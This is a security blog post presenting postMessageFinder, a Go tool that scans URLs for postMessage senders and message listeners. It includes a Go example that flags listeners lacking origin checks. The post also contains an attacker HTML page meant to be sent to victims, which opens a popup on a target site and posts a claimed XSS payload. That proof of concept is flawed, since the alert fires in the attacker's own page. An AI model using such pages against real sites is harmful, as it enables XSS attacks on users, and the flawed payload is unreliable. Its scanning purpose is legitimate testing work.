Tools: postMessageFinder

Here I'm presenting a tool I wrote last year and am now picking up again and tweaking. The tool checks whether a set of URLs contains one or more postMessage calls or message event handlers.

poc

Usage

./postMessageFinder -i urls.txt

Usage of postMessageFinder:
  -H value
        Headers ex: -H='Cookie: PHPSESSID=shjhjdgvbhjhvnv'
  -i string
        Path to file containing urls to test (default "urls.txt")
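What the tool is looking for, as an added example that is not postMessageFinder's own code: a Go scan over a page body (a constructed sample here, standing in for a fetched URL) that lists message listeners and postMessage senders and flags listeners with no visible origin check, since those are the ones worth triaging first for DOM XSS.

```go
package main

import (
	"fmt"
	"regexp"
)

// Finding is one postMessage-related construct located in a page body.
type Finding struct {
	Kind        string // "listener" or "sender"
	Snippet     string // matched text
	OriginCheck bool   // listener references .origin nearby (heuristic)
}

var (
	listenerRe = regexp.MustCompile(`(?i)addEventListener\(\s*['"]message['"]|\.onmessage\s*=`)
	senderRe   = regexp.MustCompile(`\.postMessage\s*\(`)
	originRe   = regexp.MustCompile(`\.origin\b`)
)
// ScanPage reports every message listener and postMessage sender in html. OriginCheck
// is a triage heuristic only: ".origin" appears within 300 bytes of the registration.
func ScanPage(html string) []Finding {
	var out []Finding
	for _, loc := range listenerRe.FindAllStringIndex(html, -1) {
		end := loc[1] + 300
		if end > len(html) {
			end = len(html)
		}
		out = append(out, Finding{"listener", html[loc[0]:loc[1]], originRe.MatchString(html[loc[0]:end])})
	}
	for _, loc := range senderRe.FindAllStringIndex(html, -1) {
		out = append(out, Finding{"sender", html[loc[0]:loc[1]], false})
	}
	return out
}

// SampleHTML is a constructed page body standing in for a fetched URL.
const SampleHTML = `<script>
window.addEventListener("message", function(e) { // validates the sender
  if (e.origin !== "https://trusted.example") return; handle(e.data); });
window.addEventListener("message", function(e) { // trusts any sender
  document.getElementById("out").innerHTML = e.data; }, false);
window.opener.postMessage({status: "ready"}, "*");
</script>`

func main() {
	for _, f := range ScanPage(SampleHTML) {
		fmt.Printf("%-8s origin-check=%-5v %s\n", f.Kind, f.OriginCheck, f.Snippet)
	}
}
```

A listener reported with origin-check=false is not necessarily exploitable, and one reported true is not necessarily safe; the scan only tells you where to read the handler code.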

This is useful for testing for DOM XSS vulnerabilities and related issues, where the flaw can be exploited through iframes or child pages. For example, you could host the following HTML code on a web page and send that page to your victim; a popup will be opened and a postMessage with a malicious flavour will be sent to it:

<html>
<script>
let url = "https://vulnerablewebsite.com";
let popupType = "_blank";
let popupOptions = "width=500,height=500";

// opening the popup
let childWindow = window.open(url, popupType, popupOptions);

// sending the postMessage to the popup
childWindow.postMessage({"vulnerableObject":alert("xss")});

// Here you can capture any postMessage coming back from the child page
window.addEventListener("message", function(e) {
    console.log(e.data); // the received data is in e.data
}, false);
</script>
</html>

The original GitHub repo was under the @pelaohxc account, which was expropriated by the donkeys 💩, so from now on I will be pushing updates to this GitHub repo: @xpl0ited1

In the next posts I will be showing how to exploit these postMessage issues, so stay tuned! 🤭